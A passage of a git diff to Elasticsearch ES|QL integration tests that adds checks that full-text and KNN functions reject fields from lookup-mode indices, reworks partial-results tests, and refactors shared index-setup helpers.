+                .setWaitForActiveShards(ActiveShardCount.NONE)
+        );
+    }
 }
diff --git a/x-pack/plugin/esql/src/internalClusterTest/java/org/elasticsearch/xpack/esql/action/EnrichIT.java b/x-pack/plugin/esql/src/internalClusterTest/java/org/elasticsearch/xpack/esql/action/EnrichIT.java
index 3c37f0ffbcc1d..446c287be64fc 100644
--- a/x-pack/plugin/esql/src/internalClusterTest/java/org/elasticsearch/xpack/esql/action/EnrichIT.java
+++ b/x-pack/plugin/esql/src/internalClusterTest/java/org/elasticsearch/xpack/esql/action/EnrichIT.java
@@ -50,7 +50,6 @@
 import org.elasticsearch.xpack.esql.core.type.DataType;
 import org.elasticsearch.xpack.esql.enrich.EnrichLookupService;
 import org.elasticsearch.xpack.esql.plan.logical.Enrich;
-import org.elasticsearch.xpack.esql.plugin.EsqlPlugin;
 import org.junit.After;
 import org.junit.Before;
 
@@ -81,8 +80,8 @@ public class EnrichIT extends AbstractEsqlIntegTestCase {
 
     @Override
     protected Collection<Class<? extends Plugin>> nodePlugins() {
-        List<Class<? extends Plugin>> plugins = new ArrayList<>(super.nodePlugins());
-        plugins.add(EsqlPlugin.class);
+        List<Class<? extends Plugin>> plugins = new ArrayList<>();
+        plugins.add(EsqlActionBreakerIT.EsqlTestPluginWithMockBlockFactory.class);
         plugins.add(InternalExchangePlugin.class);
         plugins.add(LocalStateEnrich.class);
         plugins.add(IngestCommonPlugin.class);
diff --git a/x-pack/plugin/esql/src/internalClusterTest/java/org/elasticsearch/xpack/esql/action/EsqlActionIT.java b/x-pack/plugin/esql/src/internalClusterTest/java/org/elasticsearch/xpack/esql/action/EsqlActionIT.java
index 488c90f77d3e4..1c409a6b47820 100644
--- a/x-pack/plugin/esql/src/internalClusterTest/java/org/elasticsearch/xpack/esql/action/EsqlActionIT.java
+++ b/x-pack/plugin/esql/src/internalClusterTest/java/org/elasticsearch/xpack/esql/action/EsqlActionIT.java
@@ -38,6 +38,7 @@
 import org.elasticsearch.index.IndexSettings;
 import org.elasticsearch.index.mapper.DateFieldMapper;
 import org.elasticsearch.index.mapper.extras.MapperExtrasPlugin;
+import org.elasticsearch.index.query.BoolQueryBuilder;
 import org.elasticsearch.index.query.QueryBuilder;
 import org.elasticsearch.index.query.RangeQueryBuilder;
 import org.elasticsearch.index.shard.IndexShard;
@@ -147,6 +148,13 @@ public void testRow() {
         }
     }
 
+    public void testRowWithFilter() {
+        long value = randomLongBetween(0, Long.MAX_VALUE);
+        try (EsqlQueryResponse response = run(syncEsqlQueryRequest().query("row " + value).filter(new BoolQueryBuilder().boost(1.0f)))) {
+            assertEquals(List.of(List.of(value)), getValuesList(response));
+        }
+    }
+
     public void testFromStatsGroupingAvgWithSort() {
         testFromStatsGroupingAvgImpl("from test | stats avg(count) by data | sort data | limit 2", "data", "avg(count)");
     }
@@ -1680,6 +1688,7 @@ public void testQueryOnEmptyDataIndex() {
     }
 
     public void testGroupingStatsOnMissingFields() {
+        assumeTrue("Pragmas are only allowed in snapshots", Build.current().isSnapshot());
         assertAcked(client().admin().indices().prepareCreate("missing_field_index").setMapping("data", "type=long"));
         long oneValue = between(1, 1000);
         indexDoc("missing_field_index", "1", "data", oneValue);
diff --git a/x-pack/plugin/esql/src/internalClusterTest/java/org/elasticsearch/xpack/esql/action/EsqlActionTaskIT.java b/x-pack/plugin/esql/src/internalClusterTest/java/org/elasticsearch/xpack/esql/action/EsqlActionTaskIT.java
index e98574926e586..efefde8871546 100644
--- a/x-pack/plugin/esql/src/internalClusterTest/java/org/elasticsearch/xpack/esql/action/EsqlActionTaskIT.java
+++ b/x-pack/plugin/esql/src/internalClusterTest/java/org/elasticsearch/xpack/esql/action/EsqlActionTaskIT.java
@@ -19,7 +19,7 @@
 import org.elasticsearch.common.util.CollectionUtils;
 import org.elasticsearch.common.util.concurrent.AbstractRunnable;
 import org.elasticsearch.compute.lucene.LuceneSourceOperator;
-import org.elasticsearch.compute.lucene.ValuesSourceReaderOperator;
+import org.elasticsearch.compute.lucene.read.ValuesSourceReaderOperatorStatus;
 import org.elasticsearch.compute.operator.DriverStatus;
 import org.elasticsearch.compute.operator.DriverTaskRunner;
 import org.elasticsearch.compute.operator.OperatorStatus;
@@ -129,12 +129,13 @@ public void testTaskContents() throws Exception {
             }
             if (o.operator().equals("ValuesSourceReaderOperator[fields = [pause_me]]")) {
                 assertThat(description, equalTo("data"));
-                ValuesSourceReaderOperator.Status oStatus = (ValuesSourceReaderOperator.Status) o.status();
+                ValuesSourceReaderOperatorStatus oStatus = (ValuesSourceReaderOperatorStatus) o.status();
                 assertMap(
                     oStatus.readersBuilt(),
                     matchesMap().entry("pause_me:column_at_a_time:ScriptLongs", greaterThanOrEqualTo(1))
                 );
-                assertThat(oStatus.pagesProcessed(), greaterThanOrEqualTo(1));
+                assertThat(oStatus.pagesReceived(), greaterThanOrEqualTo(1));
+                assertThat(oStatus.pagesEmitted(), greaterThanOrEqualTo(1));
                 assertThat(oStatus.valuesLoaded(), greaterThanOrEqualTo(1L));
                 valuesSourceReaders++;
                 continue;
diff --git a/x-pack/plugin/esql/src/internalClusterTest/java/org/elasticsearch/xpack/esql/action/EsqlNodeFailureIT.java b/x-pack/plugin/esql/src/internalClusterTest/java/org/elasticsearch/xpack/esql/action/EsqlNodeFailureIT.java
index 30b05f741ec82..7da333e12f7e6 100644
--- a/x-pack/plugin/esql/src/internalClusterTest/java/org/elasticsearch/xpack/esql/action/EsqlNodeFailureIT.java
+++ b/x-pack/plugin/esql/src/internalClusterTest/java/org/elasticsearch/xpack/esql/action/EsqlNodeFailureIT.java
@@ -19,6 +19,7 @@
 import org.elasticsearch.xcontent.json.JsonXContent;
 import org.elasticsearch.xpack.esql.EsqlTestUtils;
 import org.elasticsearch.xpack.esql.plugin.EsqlPlugin;
+import org.elasticsearch.xpack.esql.plugin.QueryPragmas;
 
 import java.util.ArrayList;
 import java.util.Collection;
@@ -30,6 +31,7 @@
 import static org.hamcrest.Matchers.containsString;
 import static org.hamcrest.Matchers.empty;
 import static org.hamcrest.Matchers.equalTo;
+import static org.hamcrest.Matchers.greaterThan;
 import static org.hamcrest.Matchers.in;
 import static org.hamcrest.Matchers.lessThanOrEqualTo;
 import static org.hamcrest.Matchers.not;
@@ -98,38 +100,30 @@ public void testFailureLoadingFields() throws Exception {
 
     public void testPartialResults() throws Exception {
         Set<String> okIds = populateIndices();
-        {
-            EsqlQueryRequest request = new EsqlQueryRequest();
-            request.query("FROM fail,ok | LIMIT 100");
-            request.allowPartialResults(true);
-            request.pragmas(randomPragmas());
-            try (EsqlQueryResponse resp = run(request)) {
-                assertTrue(resp.isPartial());
-                List<List<Object>> rows = EsqlTestUtils.getValuesList(resp);
-                assertThat(rows.size(), lessThanOrEqualTo(okIds.size()));
-            }
-        }
-        {
-            EsqlQueryRequest request = new EsqlQueryRequest();
-            request.query("FROM fail,ok METADATA _id | KEEP _id, fail_me | LIMIT 100");
-            request.allowPartialResults(true);
-            request.pragmas(randomPragmas());
-            try (EsqlQueryResponse resp = run(request)) {
-                assertTrue(resp.isPartial());
-                List<List<Object>> rows = EsqlTestUtils.getValuesList(resp);
-                assertThat(rows.size(), lessThanOrEqualTo(okIds.size()));
-                Set<String> actualIds = new HashSet<>();
-                for (List<Object> row : rows) {
-                    assertThat(row.size(), equalTo(2));
-                    String id = (String) row.getFirst();
-                    assertThat(id, in(okIds));
-                    assertTrue(actualIds.add(id));
-                }
-                EsqlExecutionInfo.Cluster localInfo = resp.getExecutionInfo().getCluster(RemoteClusterService.LOCAL_CLUSTER_GROUP_KEY);
-                assertThat(localInfo.getFailures(), not(empty()));
-                assertThat(localInfo.getStatus(), equalTo(EsqlExecutionInfo.Cluster.Status.PARTIAL));
-                assertThat(localInfo.getFailures().get(0).reason(), containsString("Accessing failing field"));
+        EsqlQueryRequest request = new EsqlQueryRequest();
+        request.query("FROM fail,ok METADATA _id | KEEP _id, fail_me | LIMIT 100");
+        request.allowPartialResults(true);
+        // have to run one shard at a time to avoid failing all shards
+        QueryPragmas pragma = new QueryPragmas(
+            Settings.builder().put(randomPragmas().getSettings()).put(QueryPragmas.MAX_CONCURRENT_SHARDS_PER_NODE.getKey(), 1).build()
+        );
+        request.pragmas(pragma);
+        request.acceptedPragmaRisks(true);
+        try (EsqlQueryResponse resp = run(request)) {
+            assertTrue(resp.isPartial());
+            List<List<Object>> rows = EsqlTestUtils.getValuesList(resp);
+            assertThat(rows.size(), equalTo(okIds.size()));
+            Set<String> actualIds = new HashSet<>();
+            for (List<Object> row : rows) {
+                assertThat(row.size(), equalTo(2));
+                String id = (String) row.getFirst();
+                assertThat(id, in(okIds));
+                assertTrue(actualIds.add(id));
             }
+            EsqlExecutionInfo.Cluster localInfo = resp.getExecutionInfo().getCluster(RemoteClusterService.LOCAL_CLUSTER_GROUP_KEY);
+            assertThat(localInfo.getFailures(), not(empty()));
+            assertThat(localInfo.getStatus(), equalTo(EsqlExecutionInfo.Cluster.Status.PARTIAL));
+            assertThat(localInfo.getFailures().get(0).reason(), containsString("Accessing failing field"));
         }
     }
 
@@ -147,6 +141,15 @@ public void testDefaultPartialResults() throws Exception {
         EsqlQueryRequest request = new EsqlQueryRequest();
         request.query("FROM fail,ok | LIMIT 100");
         request.pragmas(randomPragmas());
+        // have to run one shard at a time to avoid failing all shards
+        QueryPragmas pragma = new QueryPragmas(
+            Settings.builder()
+                .put(randomPragmas().getSettings())
+                .put(QueryPragmas.MAX_CONCURRENT_SHARDS_PER_NODE.getKey(), 1)
+                .build()
+        );
+        request.pragmas(pragma);
+        request.acceptedPragmaRisks(true);
         if (randomBoolean()) {
             request.allowPartialResults(true);
         }
@@ -154,6 +157,7 @@
             assertTrue(resp.isPartial());
             List<List<Object>> rows = EsqlTestUtils.getValuesList(resp);
             assertThat(rows.size(), lessThanOrEqualTo(okIds.size()));
+            assertThat(rows.size(), greaterThan(0));
         }
     }
 
     // allow_partial_results = false
diff --git a/x-pack/plugin/esql/src/internalClusterTest/java/org/elasticsearch/xpack/esql/action/LookupFromIndexIT.java b/x-pack/plugin/esql/src/internalClusterTest/java/org/elasticsearch/xpack/esql/action/LookupFromIndexIT.java
index 1355ffba796a8..e25cb82f29851 100644
--- a/x-pack/plugin/esql/src/internalClusterTest/java/org/elasticsearch/xpack/esql/action/LookupFromIndexIT.java
+++ b/x-pack/plugin/esql/src/internalClusterTest/java/org/elasticsearch/xpack/esql/action/LookupFromIndexIT.java
@@ -28,7 +28,7 @@
 import org.elasticsearch.compute.lucene.LuceneSliceQueue;
 import org.elasticsearch.compute.lucene.LuceneSourceOperator;
 import org.elasticsearch.compute.lucene.ShardContext;
-import org.elasticsearch.compute.lucene.ValuesSourceReaderOperator;
+import org.elasticsearch.compute.lucene.read.ValuesSourceReaderOperator;
 import org.elasticsearch.compute.operator.Driver;
 import org.elasticsearch.compute.operator.DriverContext;
 import org.elasticsearch.compute.operator.DriverRunner;
@@ -60,6 +60,7 @@
 import org.elasticsearch.xpack.esql.core.type.DataType;
 import org.elasticsearch.xpack.esql.enrich.LookupFromIndexOperator;
 import org.elasticsearch.xpack.esql.planner.EsPhysicalOperationProviders;
+import org.elasticsearch.xpack.esql.planner.PhysicalSettings;
 import org.elasticsearch.xpack.esql.planner.PlannerUtils;
 import org.elasticsearch.xpack.esql.plugin.EsqlPlugin;
 import org.elasticsearch.xpack.esql.plugin.QueryPragmas;
@@ -198,6 +199,7 @@ private void runLookup(DataType keyType, PopulateIndices populateIndices) throws
             false // no scoring
         );
         ValuesSourceReaderOperator.Factory reader = new ValuesSourceReaderOperator.Factory(
+            PhysicalSettings.VALUES_LOADING_JUMBO_SIZE.getDefault(Settings.EMPTY),
             List.of(
                 new ValuesSourceReaderOperator.FieldInfo(
                     "key",
diff --git a/x-pack/plugin/esql/src/internalClusterTest/java/org/elasticsearch/xpack/esql/action/LookupJoinTypesIT.java b/x-pack/plugin/esql/src/internalClusterTest/java/org/elasticsearch/xpack/esql/action/LookupJoinTypesIT.java
index df021f27a31fe..731b2976f88d8 100644
--- a/x-pack/plugin/esql/src/internalClusterTest/java/org/elasticsearch/xpack/esql/action/LookupJoinTypesIT.java
+++ b/x-pack/plugin/esql/src/internalClusterTest/java/org/elasticsearch/xpack/esql/action/LookupJoinTypesIT.java
@@ -19,6 +19,8 @@
 import org.elasticsearch.xpack.core.esql.action.ColumnInfo;
 import org.elasticsearch.xpack.esql.VerificationException;
 import org.elasticsearch.xpack.esql.core.type.DataType;
+import org.elasticsearch.xpack.esql.expression.function.DocsV3Support;
+import org.elasticsearch.xpack.esql.expression.function.EsqlFunctionRegistry;
 import org.elasticsearch.xpack.esql.plan.logical.join.Join;
 import org.elasticsearch.xpack.esql.plugin.EsqlPlugin;
 import org.elasticsearch.xpack.spatial.SpatialPlugin;
@@ -36,6 +38,7 @@
 import java.util.Map;
 import java.util.Set;
 import java.util.function.Consumer;
+import java.util.function.Supplier;
 import java.util.stream.Collectors;
 
 import static org.elasticsearch.test.ESIntegTestCase.Scope.SUITE;
@@ -265,6 +268,22 @@ private static boolean existingIndex(Collection existing, DataType
         return existing.stream().anyMatch(c -> c.exists(indexName));
     }
 
+    /** This test generates documentation for the supported output types of the lookup join. */
+    public void testOutputSupportedTypes() throws Exception {
+        Map<List<DataType>, DataType> signatures = new LinkedHashMap<>();
+        for (TestConfigs configs : testConfigurations.values()) {
+            if (configs.group.equals("unsupported") || configs.group.equals("union-types")) {
+                continue;
+            }
+            for (TestConfig config : configs.configs.values()) {
+                if (config instanceof TestConfigPasses) {
+                    signatures.put(List.of(config.mainType(), config.lookupType()), null);
+                }
+            }
+        }
+        saveJoinTypes(() -> signatures);
+    }
+
     public void testLookupJoinStrings() {
         testLookupJoinTypes("strings");
     }
@@ -747,4 +766,18 @@ public void doTest() {
 
     private boolean isValidDataType(DataType dataType) {
         return UNDER_CONSTRUCTION.get(dataType) == null || UNDER_CONSTRUCTION.get(dataType).isEnabled();
     }
+
+    private static void saveJoinTypes(Supplier<Map<List<DataType>, DataType>> signatures) throws Exception {
+        ArrayList<EsqlFunctionRegistry.ArgSignature> args = new ArrayList<>();
+        args.add(new EsqlFunctionRegistry.ArgSignature("field from the left index", null, null, false, false));
+        args.add(new EsqlFunctionRegistry.ArgSignature("field from the lookup index", null, null, false, false));
+        DocsV3Support.CommandsDocsSupport docs = new DocsV3Support.CommandsDocsSupport(
+            "lookup-join",
+            LookupJoinTypesIT.class,
+            null,
+            args,
+            signatures
+        );
+        docs.renderDocs();
+    }
 }
diff --git a/x-pack/plugin/esql/src/internalClusterTest/java/org/elasticsearch/xpack/esql/plugin/CanMatchIT.java b/x-pack/plugin/esql/src/internalClusterTest/java/org/elasticsearch/xpack/esql/plugin/CanMatchIT.java
index e1ef6730c1f05..541e6a1421946 100644
--- a/x-pack/plugin/esql/src/internalClusterTest/java/org/elasticsearch/xpack/esql/plugin/CanMatchIT.java
+++ b/x-pack/plugin/esql/src/internalClusterTest/java/org/elasticsearch/xpack/esql/plugin/CanMatchIT.java
@@ -19,8 +19,10 @@
 import org.elasticsearch.index.shard.ShardId;
 import org.elasticsearch.plugins.Plugin;
 import org.elasticsearch.test.transport.MockTransportService;
+import org.elasticsearch.transport.RemoteClusterAware;
 import org.elasticsearch.transport.TransportService;
 import org.elasticsearch.xpack.esql.action.AbstractEsqlIntegTestCase;
+import org.elasticsearch.xpack.esql.action.EsqlExecutionInfo;
 import org.elasticsearch.xpack.esql.action.EsqlQueryResponse;
 
 import java.util.Collection;
@@ -363,6 +365,10 @@ public void testFailOnUnavailableShards() throws Exception {
                 syncEsqlQueryRequest().query("from events,logs | KEEP timestamp,message").allowPartialResults(true)
             )
         ) {
+            assertTrue(resp.isPartial());
+            EsqlExecutionInfo.Cluster local = resp.getExecutionInfo().getCluster(RemoteClusterAware.LOCAL_CLUSTER_GROUP_KEY);
+            assertThat(local.getFailures(), hasSize(1));
+            assertThat(local.getFailures().get(0).reason(), containsString("index [logs] has no active shard copy"));
             assertThat(getValuesList(resp), hasSize(3));
         }
     }
diff --git a/x-pack/plugin/esql/src/internalClusterTest/java/org/elasticsearch/xpack/esql/plugin/KnnFunctionIT.java b/x-pack/plugin/esql/src/internalClusterTest/java/org/elasticsearch/xpack/esql/plugin/KnnFunctionIT.java
index a262943909938..a107e58c0869c 100644
--- a/x-pack/plugin/esql/src/internalClusterTest/java/org/elasticsearch/xpack/esql/plugin/KnnFunctionIT.java
+++ b/x-pack/plugin/esql/src/internalClusterTest/java/org/elasticsearch/xpack/esql/plugin/KnnFunctionIT.java
@@ -8,11 +8,14 @@
 package org.elasticsearch.xpack.esql.plugin;
 
 import org.elasticsearch.action.index.IndexRequestBuilder;
+import org.elasticsearch.client.internal.IndicesAdminClient;
 import org.elasticsearch.cluster.metadata.IndexMetadata;
 import org.elasticsearch.common.settings.Settings;
+import org.elasticsearch.index.IndexSettings;
 import org.elasticsearch.xcontent.XContentBuilder;
 import org.elasticsearch.xcontent.XContentFactory;
 import org.elasticsearch.xpack.esql.EsqlTestUtils;
+import org.elasticsearch.xpack.esql.VerificationException;
 import org.elasticsearch.xpack.esql.action.AbstractEsqlIntegTestCase;
 import org.elasticsearch.xpack.esql.action.EsqlCapabilities;
 import org.junit.Before;
@@ -25,7 +28,9 @@
 import java.util.Locale;
 import java.util.Map;
 
+import static org.elasticsearch.index.IndexMode.LOOKUP;
 import static org.elasticsearch.test.hamcrest.ElasticsearchAssertions.assertAcked;
+import static org.hamcrest.CoreMatchers.containsString;
 
 public class KnnFunctionIT extends AbstractEsqlIntegTestCase {
 
@@ -109,6 +114,26 @@ public void testKnnNonPushedDown() {
         }
     }
 
+    public void testKnnWithLookupJoin() {
+        float[] queryVector = new float[numDims];
+        Arrays.fill(queryVector, 1.0f);
+
+        var query = String.format(Locale.ROOT, """
+            FROM test
+            | LOOKUP JOIN test_lookup ON id
+            | WHERE KNN(lookup_vector, %s, {"k": 5}) OR id > 10
+            """, Arrays.toString(queryVector));
+
+        var error = expectThrows(VerificationException.class, () -> run(query));
+        assertThat(
+            error.getMessage(),
+            containsString(
+                "line 3:13: [KNN] function cannot operate on [lookup_vector], supplied by an index [test_lookup] in non-STANDARD "
+                    + "mode [lookup]"
+            )
+        );
+    }
+
     @Before
     public void setup() throws IOException {
         assumeTrue("Needs KNN support", EsqlCapabilities.Cap.KNN_FUNCTION.isEnabled());
@@ -152,5 +177,31 @@
         }
 
         indexRandom(true, docs);
+
+        createAndPopulateLookupIndex(client, "test_lookup");
+    }
+
+    private void createAndPopulateLookupIndex(IndicesAdminClient client, String lookupIndexName) throws IOException {
+        XContentBuilder mapping = XContentFactory.jsonBuilder()
+            .startObject()
+            .startObject("properties")
+            .startObject("id")
+            .field("type", "integer")
+            .endObject()
+            .startObject("lookup_vector")
+            .field("type", "dense_vector")
+            .field("similarity", "l2_norm")
+            .endObject()
+            .endObject()
+            .endObject();
+
+        Settings.Builder settingsBuilder = Settings.builder()
+            .put(IndexMetadata.SETTING_NUMBER_OF_REPLICAS, 0)
+            .put(IndexMetadata.SETTING_NUMBER_OF_SHARDS, 1)
+            .put(IndexSettings.MODE.getKey(), LOOKUP.getName());
+
+        var createRequest = client.prepareCreate(lookupIndexName).setMapping(mapping).setSettings(settingsBuilder.build());
+        assertAcked(createRequest);
+    }
 }
diff --git a/x-pack/plugin/esql/src/internalClusterTest/java/org/elasticsearch/xpack/esql/plugin/KqlFunctionIT.java b/x-pack/plugin/esql/src/internalClusterTest/java/org/elasticsearch/xpack/esql/plugin/KqlFunctionIT.java
index 10a17bb05135b..e8f14ef8388b7 100644
--- a/x-pack/plugin/esql/src/internalClusterTest/java/org/elasticsearch/xpack/esql/plugin/KqlFunctionIT.java
+++ b/x-pack/plugin/esql/src/internalClusterTest/java/org/elasticsearch/xpack/esql/plugin/KqlFunctionIT.java
@@ -75,12 +75,12 @@ public void testKqlQueryWithinEval() {
 
     public void testInvalidKqlQueryEof() {
         var query = """
             FROM test
-            | WHERE kql("content: ((((dog")
+            | WHERE kql("content: (dog")
             """;
 
         var error = expectThrows(QueryShardException.class, () -> run(query));
-        assertThat(error.getMessage(), containsString("Failed to parse KQL query [content: ((((dog]"));
-        assertThat(error.getRootCause().getMessage(), containsString("line 1:11: mismatched input '('"));
+        assertThat(error.getMessage(), containsString("Failed to parse KQL query [content: (dog]"));
+        assertThat(error.getRootCause().getMessage(), containsString("line 1:14: missing ')' at '<EOF>'"));
     }
 
     public void testInvalidKqlQueryLexicalError() {
diff --git a/x-pack/plugin/esql/src/internalClusterTest/java/org/elasticsearch/xpack/esql/plugin/MatchFunctionIT.java b/x-pack/plugin/esql/src/internalClusterTest/java/org/elasticsearch/xpack/esql/plugin/MatchFunctionIT.java
index 23958fcd35f30..82124c4c85bb8 100644
--- a/x-pack/plugin/esql/src/internalClusterTest/java/org/elasticsearch/xpack/esql/plugin/MatchFunctionIT.java
+++ b/x-pack/plugin/esql/src/internalClusterTest/java/org/elasticsearch/xpack/esql/plugin/MatchFunctionIT.java
@@ -10,6 +10,7 @@
 import org.elasticsearch.ElasticsearchException;
 import org.elasticsearch.action.index.IndexRequest;
 import org.elasticsearch.action.support.WriteRequest;
+import org.elasticsearch.client.internal.IndicesAdminClient;
 import org.elasticsearch.common.settings.Settings;
 import org.elasticsearch.xpack.esql.VerificationException;
 import org.elasticsearch.xpack.esql.action.AbstractEsqlIntegTestCase;
@@ -17,6 +18,7 @@
 import org.junit.Before;
 
 import java.util.List;
+import java.util.function.Consumer;
 
 import static org.elasticsearch.test.hamcrest.ElasticsearchAssertions.assertAcked;
 import static org.elasticsearch.xpack.esql.EsqlTestUtils.getValuesList;
@@ -27,7 +29,7 @@ public class MatchFunctionIT extends AbstractEsqlIntegTestCase {
 
     @Before
     public void setupIndex() {
-        createAndPopulateIndex();
+        createAndPopulateIndex(this::ensureYellow);
     }
 
     public void testSimpleWhereMatch() {
@@ -294,13 +296,30 @@ public void testMatchWithinEval() {
         assertThat(error.getMessage(), containsString("[MATCH] function is only supported in WHERE and STATS commands"));
     }
 
-    private void createAndPopulateIndex() {
+    public void testMatchWithLookupJoin() {
+        var query = """
+            FROM test
+            | LOOKUP JOIN test_lookup ON id
+            | WHERE id > 0 AND MATCH(lookup_content, "fox")
+            """;
+
+        var error = expectThrows(VerificationException.class, () -> run(query));
+        assertThat(
+            error.getMessage(),
+            containsString(
+                "line 3:26: [MATCH] function cannot operate on [lookup_content], supplied by an index [test_lookup] "
+                    + "in non-STANDARD mode [lookup]"
+            )
+        );
+    }
+
+    static void createAndPopulateIndex(Consumer<String[]> ensureYellow) {
         var indexName = "test";
         var client = client().admin().indices();
-        var CreateRequest = client.prepareCreate(indexName)
+        var createRequest = client.prepareCreate(indexName)
             .setSettings(Settings.builder().put("index.number_of_shards", 1))
             .setMapping("id", "type=integer", "content", "type=text");
-        assertAcked(CreateRequest);
+        assertAcked(createRequest);
         client().prepareBulk()
             .add(new IndexRequest(indexName).id("1").source("id", 1, "content", "This is a brown fox"))
             .add(new IndexRequest(indexName).id("2").source("id", 2, "content", "This is a brown dog"))
@@ -310,6 +329,17 @@
             .add(new IndexRequest(indexName).id("6").source("id", 6, "content", "The quick brown fox jumps over the lazy dog"))
             .setRefreshPolicy(WriteRequest.RefreshPolicy.IMMEDIATE)
             .get();
-        ensureYellow(indexName);
+
+        var lookupIndexName = "test_lookup";
+        createAndPopulateLookupIndex(client, lookupIndexName);
+
+        ensureYellow.accept(new String[] { indexName, lookupIndexName });
+    }
+
+    static void createAndPopulateLookupIndex(IndicesAdminClient client, String lookupIndexName) {
+        var createRequest = client.prepareCreate(lookupIndexName)
+            .setSettings(Settings.builder().put("index.number_of_shards", 1).put("index.mode", "lookup"))
"type=integer", "lookup_content", "type=text"); + assertAcked(createRequest); } } diff --git a/x-pack/plugin/esql/src/internalClusterTest/java/org/elasticsearch/xpack/esql/plugin/MatchOperatorIT.java b/x-pack/plugin/esql/src/internalClusterTest/java/org/elasticsearch/xpack/esql/plugin/MatchOperatorIT.java index 5a87a4b4302c4..efad0f92ae967 100644 --- a/x-pack/plugin/esql/src/internalClusterTest/java/org/elasticsearch/xpack/esql/plugin/MatchOperatorIT.java +++ b/x-pack/plugin/esql/src/internalClusterTest/java/org/elasticsearch/xpack/esql/plugin/MatchOperatorIT.java @@ -8,9 +8,6 @@ package org.elasticsearch.xpack.esql.plugin; import org.elasticsearch.ElasticsearchException; -import org.elasticsearch.action.index.IndexRequest; -import org.elasticsearch.action.support.WriteRequest; -import org.elasticsearch.common.settings.Settings; import org.elasticsearch.index.query.QueryBuilder; import org.elasticsearch.index.query.QueryBuilders; import org.elasticsearch.xpack.esql.VerificationException; @@ -21,7 +18,6 @@ import static org.elasticsearch.index.query.QueryBuilders.boolQuery; import static org.elasticsearch.index.query.QueryBuilders.matchQuery; -import static org.elasticsearch.test.hamcrest.ElasticsearchAssertions.assertAcked; import static org.elasticsearch.xpack.esql.action.EsqlQueryRequest.syncEsqlQueryRequest; import static org.hamcrest.CoreMatchers.containsString; @@ -30,7 +26,7 @@ public class MatchOperatorIT extends AbstractEsqlIntegTestCase { @Before public void setupIndex() { - createAndPopulateIndex(); + MatchFunctionIT.createAndPopulateIndex(this::ensureYellow); } public void testSimpleWhereMatch() { @@ -372,22 +368,20 @@ public void testMatchWithNonTextField() { } } - private void createAndPopulateIndex() { - var indexName = "test"; - var client = client().admin().indices(); - var CreateRequest = client.prepareCreate(indexName) - .setSettings(Settings.builder().put("index.number_of_shards", 1)) - .setMapping("id", "type=integer", "content", "type=text"); - assertAcked(CreateRequest); - client().prepareBulk() - .add(new IndexRequest(indexName).id("1").source("id", 1, "content", "This is a brown fox")) - .add(new IndexRequest(indexName).id("2").source("id", 2, "content", "This is a brown dog")) - .add(new IndexRequest(indexName).id("3").source("id", 3, "content", "This dog is really brown")) - .add(new IndexRequest(indexName).id("4").source("id", 4, "content", "The dog is brown but this document is very very long")) - .add(new IndexRequest(indexName).id("5").source("id", 5, "content", "There is also a white cat")) - .add(new IndexRequest(indexName).id("6").source("id", 6, "content", "The quick brown fox jumps over the lazy dog")) - .setRefreshPolicy(WriteRequest.RefreshPolicy.IMMEDIATE) - .get(); - ensureYellow(indexName); + public void testMatchOperatorWithLookupJoin() { + var query = """ + FROM test + | LOOKUP JOIN test_lookup ON id + | WHERE id > 0 AND lookup_content : "fox" + """; + + var error = expectThrows(VerificationException.class, () -> run(query)); + assertThat( + error.getMessage(), + containsString( + "line 3:20: [:] operator cannot operate on [lookup_content], supplied by an index [test_lookup] " + + "in non-STANDARD mode [lookup]" + ) + ); } } diff --git a/x-pack/plugin/esql/src/internalClusterTest/java/org/elasticsearch/xpack/esql/plugin/MatchPhraseFunctionIT.java b/x-pack/plugin/esql/src/internalClusterTest/java/org/elasticsearch/xpack/esql/plugin/MatchPhraseFunctionIT.java index 44f28e0c9ea93..f269fc7d2bd46 100644 --- 
a/x-pack/plugin/esql/src/internalClusterTest/java/org/elasticsearch/xpack/esql/plugin/MatchPhraseFunctionIT.java +++ b/x-pack/plugin/esql/src/internalClusterTest/java/org/elasticsearch/xpack/esql/plugin/MatchPhraseFunctionIT.java @@ -8,9 +8,6 @@ package org.elasticsearch.xpack.esql.plugin; import org.elasticsearch.ElasticsearchException; -import org.elasticsearch.action.index.IndexRequest; -import org.elasticsearch.action.support.WriteRequest; -import org.elasticsearch.common.settings.Settings; import org.elasticsearch.xpack.esql.VerificationException; import org.elasticsearch.xpack.esql.action.AbstractEsqlIntegTestCase; import org.hamcrest.Matchers; @@ -19,8 +16,8 @@ import java.util.Collections; import java.util.List; -import static org.elasticsearch.test.hamcrest.ElasticsearchAssertions.assertAcked; import static org.elasticsearch.xpack.esql.EsqlTestUtils.getValuesList; +import static org.elasticsearch.xpack.esql.plugin.MatchFunctionIT.createAndPopulateIndex; import static org.hamcrest.CoreMatchers.containsString; //@TestLogging(value = "org.elasticsearch.xpack.esql:TRACE,org.elasticsearch.compute:TRACE", reason = "debug") @@ -28,7 +25,7 @@ public class MatchPhraseFunctionIT extends AbstractEsqlIntegTestCase { @Before public void setupIndex() { - createAndPopulateIndex(); + createAndPopulateIndex(this::ensureYellow); } public void testSimpleWhereMatchPhrase() { @@ -325,22 +322,20 @@ public void testMatchPhraseWithinEval() { assertThat(error.getMessage(), containsString("[MatchPhrase] function is only supported in WHERE and STATS commands")); } - private void createAndPopulateIndex() { - var indexName = "test"; - var client = client().admin().indices(); - var CreateRequest = client.prepareCreate(indexName) - .setSettings(Settings.builder().put("index.number_of_shards", 1)) - .setMapping("id", "type=integer", "content", "type=text"); - assertAcked(CreateRequest); - client().prepareBulk() - .add(new IndexRequest(indexName).id("1").source("id", 1, "content", "This is a brown fox")) - .add(new IndexRequest(indexName).id("2").source("id", 2, "content", "This is a brown dog")) - .add(new IndexRequest(indexName).id("3").source("id", 3, "content", "This dog is really brown")) - .add(new IndexRequest(indexName).id("4").source("id", 4, "content", "The dog is brown but this document is very very long")) - .add(new IndexRequest(indexName).id("5").source("id", 5, "content", "There is also a white cat")) - .add(new IndexRequest(indexName).id("6").source("id", 6, "content", "The quick brown fox jumps over the lazy dog")) - .setRefreshPolicy(WriteRequest.RefreshPolicy.IMMEDIATE) - .get(); - ensureYellow(indexName); + public void testMatchPhraseWithLookupJoin() { + var query = """ + FROM test + | LOOKUP JOIN test_lookup ON id + | WHERE id > 0 AND MATCH_PHRASE(lookup_content, "fox") + """; + + var error = expectThrows(VerificationException.class, () -> run(query)); + assertThat( + error.getMessage(), + containsString( + "line 3:33: [MatchPhrase] function cannot operate on [lookup_content], supplied by an index [test_lookup] " + + "in non-STANDARD mode [lookup]" + ) + ); } } diff --git 